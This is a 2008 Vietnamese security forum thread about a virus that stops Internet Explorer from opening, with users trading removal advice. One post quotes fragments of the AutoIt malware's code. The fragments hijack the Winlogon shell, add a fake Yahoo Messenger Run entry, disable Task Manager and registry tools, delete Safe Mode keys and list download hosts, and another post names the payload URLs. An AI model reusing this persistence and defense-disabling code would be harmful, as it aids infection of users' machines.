English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Không thể vào IE !!!  XML
  [Question]   Không thể vào IE !!! 29/08/2008 05:41:10 (+0700) | #1 | 148824
chaien281985
Member
[Minus]    0    [Plus]
Joined: 17/06/2007 14:48:15
Messages: 248
Location: HVAN
Offline
[Profile] [PM] [WWW]
chào mọi người !!!

Máy mình ko hiểu sao cứ vào IE là nó tự động tắt luôn cái IE đó. Không thể nào mở trình duyệt lên được.
Mình nghĩ là do virus nhưng kiểm tra trong task manager ko thấy tiến trình nào lạ cả?

vậy ai biết là do cái gì, và cách khắc phục ra sao, xin giúp mình
Cảm ơn rất nhiều !!!
[Up] [Print Copy]
  [Question]   Re: Không thể vào IE !!! 30/08/2008 08:03:36 (+0700) | #2 | 148969
hunkent88
Member
[Minus]    0    [Plus]
Joined: 13/04/2008 23:06:18
Messages: 2
Offline
[Profile] [PM]
uh.máy nhà mình cũng bị như vậy.ko thể mở IE và Y!M được.Nhà có mạng mà cứ như ko,tức chết.Ai bít cách giải quyết thì giúp mình với!
[Up] [Print Copy]
  [Question]   Re: Không thể vào IE !!! 30/08/2008 08:38:51 (+0700) | #3 | 148974
[Avatar]
 quanta
Moderator
Joined: 28/07/2006 14:44:21
Messages: 7265
Location: $ locate `whoami`
Offline
[Profile] [PM]
Dùng Linux và Firefox.
Let's build on a great foundation!
[Up] [Print Copy]
  [Question]   Re: Không thể vào IE !!! 30/08/2008 22:01:57 (+0700) | #4 | 149060
[Avatar]
 kamikazeq
Member
[Minus]    0    [Plus]
Joined: 04/07/2006 03:20:53
Messages: 837
Location: Panic Malware Planet
Offline
[Profile] [PM] [Yahoo!]
@hunkent88:
Bạn down http://live.sysinternals.com/autoruns.exe này về, chạy và Search lần lượt các từ : ckvo, kavo, amvo, apvo ... .
Nếu có thì tại virus, bạn /hvaonline/posts/preList/24692/149343.html#149343, down về giải nén chạy diệt nó nha.
Nguyên nhân khác thì chưa rõ.

@chaien: Cũng thử dùng http://live.sysinternals.com/autoruns.exe xem có gì lạ không.
Nếu không tìm ra và khắc phục được thì bạn xài tạm FireFox đi.

PS: hoặc liên hệ mình thử xem.
IDM 5.18 http://tinyurl.com/pl2ejj | Quick Remove Malware http://tinyurl.com/lbbm9x - http://tinyurl.com/arna6g
[Up] [Print Copy]
  [Question]   Re: Không thể vào IE !!! 30/08/2008 22:55:53 (+0700) | #5 | 149063
[Avatar]
 mjning
Member
[Minus]    0    [Plus]
Joined: 14/07/2008 22:12:29
Messages: 61
Offline
[Profile] [PM]
ủa kamixxx ....... ckvo và đồng bọn có gây tổn hại gì cho IE và y! đâu nhỉ..........

http://nghiadoi.com
[Up] [Print Copy]
  [Question]   Re: Không thể vào IE !!! 30/08/2008 23:13:08 (+0700) | #6 | 149065
Merc
Member
[Minus]    0    [Plus]
Joined: 20/07/2004 06:21:59
Messages: 14
Offline
[Profile] [PM]
Virut được viết bằng Autoit.

Đầu tiên dùng các trình quản lý process kill đi cái IEXPLORER.exe trong system32. Rồi dùng một trình Registry Editor khác như Registry Workshop để vào registry tìm tới các khóa :

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

Xóa hết những gì trong dir này.

Lại navigate tới key :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\systems

Để enable lại Registry Editor trong Win.

Chạy mấy file .reg này để restore lại registry đã bị thay đổi bởi virus :

Code:
http://www.mediafire.com/?rbrw4pz0eid


Tìm tới khóa Run để xem, hình như nó còn trỏ YM về virus. Merc không nhớ lém.

Chú ý virus tạo ra nhiều file trong máy trùng tên với folder nên dùng một av khác để scan và delete zùm. Nó còn dowload files từ host :

Code:
http://chuafiledownload.t35.com/posonivy.doc
 http://chuafiledownload.t35.com/ppk.doc
[Up] [Print Copy]
  [Question]   Re: Không thể vào IE !!! 30/08/2008 23:37:28 (+0700) | #7 | 149068
[Avatar]
 mjning
Member
[Minus]    0    [Plus]
Joined: 14/07/2008 22:12:29
Messages: 61
Offline
[Profile] [PM]
sao biết nó viết = autoit hả pa.........
nhiều trình viết lắm mà....

+ đã biết nó là con gì đâu......... nếu biết thì cho xin cái name để sau này gặp còn biết người quen.... smilie

nghe ông phân tích cứ như chính nó và chính hắn á ! smilie


mấy bạn trên nói biểu hiện sơ sơ.... chưa biết là con gì hết !
http://nghiadoi.com
[Up] [Print Copy]
  [Question]   Re: Không thể vào IE !!! 31/08/2008 00:55:20 (+0700) | #8 | 149078
Merc
Member
[Minus]    0    [Plus]
Joined: 20/07/2004 06:21:59
Messages: 14
Offline
[Profile] [PM]
Một phần code của nó nè :

Code:
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", "Explorer.exe " & $A2A402040203C & $A5F40C040C013)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Yahoo Messengger", "REG_SZ", @SystemDir & "\" & $A2A402040203C & $A5F40C040C013)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions", "REG_DWORD", 1)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 1)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 1)
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule", "AtTaskMaxHours", "REG_DWORD", 0)
RegDelete("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}")
RegDelete("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared", "REG_SZ",  & "\Bi mat.exe")


Code:
If ProcessExists("game_y.exe") Then
				ProcessClose("game_y.exe")
				Sleep(0x03E8)
			EndIf


Code:
$gDimArr0000[0] = "http://setting.110mb.com"
	$gDimArr0000[1] = "http://hvaonline.com.googlepages.com"
	$gDimArr0000[2] = "http://setting3.t35.com"


Code:
WinGetTitle("Yahoo! Messenger", "")
WinExists($A50F0C0F0C04D, "Phone In")
$gDimArr0003[] = "Vao coi tin nay di " &  & " "
"Bkav,System Configuration,Registry,Regedit,Task,Policy,Bkis,HijackThis,FireLion,cmd,Process,Kasperky,Norton,H V A O n l i n e,HVAOnline,Google,Search,AGV"


Ha ha, nó còn search cả chữ HVA để kill lol
[Up] [Print Copy]
  [Question]   Re: Không thể vào IE !!! 31/08/2008 09:36:40 (+0700) | #9 | 149148
[Avatar]
 mjning
Member
[Minus]    0    [Plus]
Joined: 14/07/2008 22:12:29
Messages: 61
Offline
[Profile] [PM]
ek..... con này nó cũng quạy nhiều đó chứ..... nếu đúng là con này... thì khổ chủ chưa nói hết biểu hiện.... NofolderOptions, DisableTaskMgr, DisableRegistryTools....

mà khổ chủ ở đây nói

chaien281985 wrote:
chào mọi người !!!

Máy mình ko hiểu sao cứ vào IE là nó tự động tắt luôn cái IE đó. Không thể nào mở trình duyệt lên được.
Mình nghĩ là do virus nhưng kiểm tra trong task manager ko thấy tiến trình nào lạ cả?

vậy ai biết là do cái gì, và cách khắc phục ra sao, xin giúp mình
Cảm ơn rất nhiều !!!
 


==> có phải chính nó và chính hắn ko ông ??
http://nghiadoi.com
[Up] [Print Copy]
  [Question]   Re: Không thể vào IE !!! 04/09/2008 01:17:54 (+0700) | #10 | 149546
chaien281985
Member
[Minus]    0    [Plus]
Joined: 17/06/2007 14:48:15
Messages: 248
Location: HVAN
Offline
[Profile] [PM] [WWW]
Đúng như bạn mjning nói, mình ko thấy process nào tên là kavo, kava hay gì gì cả. Vào Y!M vẫn bình thường. Chỉ có IE là bất thường thôi.
[Up] [Print Copy]
  [Question]   Re: Không thể vào IE !!! 04/09/2008 09:09:23 (+0700) | #11 | 149606
coldvalentine
Member
[Minus]    0    [Plus]
Joined: 30/08/2008 02:32:59
Messages: 2
Offline
[Profile] [PM]
Máy nhà mình cũng bị không vào được YM. Qua tìm hiểu trên 1 số diễn đàn thì do bon kavo mà ra. Mình đã dùng NAV và BKAV mà vẫn ko được, search bang Autorun của bạn Kamikazeq thi ra 1 file ckvo.exe tại systeme32 nhưng chương trình bạn dùng để kill mình ko down đc.
Mong các bạn giúp đỡ.

P/S: mình dính cả laptop lẫn PC smilie(
[Up] [Print Copy]
  [Question]   Re: Không thể vào IE !!! 04/09/2008 11:39:34 (+0700) | #12 | 149618
[Avatar]
 kamikazeq
Member
[Minus]    0    [Plus]
Joined: 04/07/2006 03:20:53
Messages: 837
Location: Panic Malware Planet
Offline
[Profile] [PM] [Yahoo!]
Srr, đã sửa lại Link. Bạn down lại nhé.
IDM 5.18 http://tinyurl.com/pl2ejj | Quick Remove Malware http://tinyurl.com/lbbm9x - http://tinyurl.com/arna6g
[Up] [Print Copy]
  [Question]   Re: Không thể vào IE !!! 09/09/2008 05:49:16 (+0700) | #13 | 150392
coldvalentine
Member
[Minus]    0    [Plus]
Joined: 30/08/2008 02:32:59
Messages: 2
Offline
[Profile] [PM]
It's ok now. Thanks Kamikazeq ^^
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|